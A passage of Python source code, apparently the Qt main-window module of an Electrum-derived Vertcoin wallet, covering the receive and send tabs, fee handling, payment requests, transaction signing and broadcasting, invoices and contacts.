if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename().decode('utf8')))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Vertcoin address where the payment should be received. Note that each payment request uses a different Vertcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([x[0] for x in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Vertcoin addresses.'),
_('The Vertcoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = req.get('sig').decode('hex')
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text())
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = expiration_values[i][1]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(str(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address()
if addr:
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text()).encode('utf8')
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Vertcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Vertcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Vertcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
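# fee_cb receives (dyn, pos, fee_rate) from the slider: with dynamic
# fees it persists the slider position as 'fee_level', otherwise the
# absolute rate as 'fee_per_kb', then recomputes the amount or fee.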
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if self.is_max:
self.spend_max()
else:
self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
_('and you will have the possibility, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(False)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.fee_e, 5, 2)
grid.addWidget(self.rbf_checkbox, 5, 3)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is None:
return
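# rbf_policy, as used below: 0 = always offer the RBF checkbox,
# 1 = offer it only when the fee rate maps to the dynamic-fee extremes,
# 2 = never offer it.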
rbf_policy = self.config.get('rbf_policy', 2)
if rbf_policy == 0:
b = True
elif rbf_policy == 1:
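# fee is in satoshis and estimated_size() in bytes, so fee * 1000 / size
# gives the rate in satoshis per kB.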
fee_rate = fee * 1000 / tx.estimated_size()
try:
c = self.config.reverse_dynfee(fee_rate)
b = c in [-1, 25]
except:
b = False
else:
# treat any unexpected policy value like 2 (never), and avoid an
# unbound 'b' below
b = False
self.rbf_checkbox.setVisible(b)
self.rbf_checkbox.setChecked(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = coins
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
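# Usage sketch for @protected (see sign_tx and show_seed_dialog below):
#
#   @protected
#   def do_thing(self, arg, password):
#       ...  # password is None for unencrypted wallets
#
# Callers invoke self.do_thing(arg); the wrapper prompts for the
# password and injects it as the 'password' keyword argument.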
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = unicode( self.message_e.text() )
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.') % alias + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Vertcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Vertcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.rbf_checkbox.isChecked()
if use_rbf:
tx.set_rbf(True)
if fee < tx.required_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(unicode(URI), self.on_pr)
except BaseException as e:
self.show_error(_('Invalid Vertcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
from address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_utxo_tab(self):
from utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
# exporting writes a file, so use the save dialog (default name from the request id)
fn = self.getSaveFileName(_("Save invoice to file"), key + '.bip70', "*.bip70")
if not fn:
return
with open(fn, 'w') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
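# mkfunc is a closure factory: binding 'method' as an argument gives
# each console command its own name. A plain lambda in the loop below
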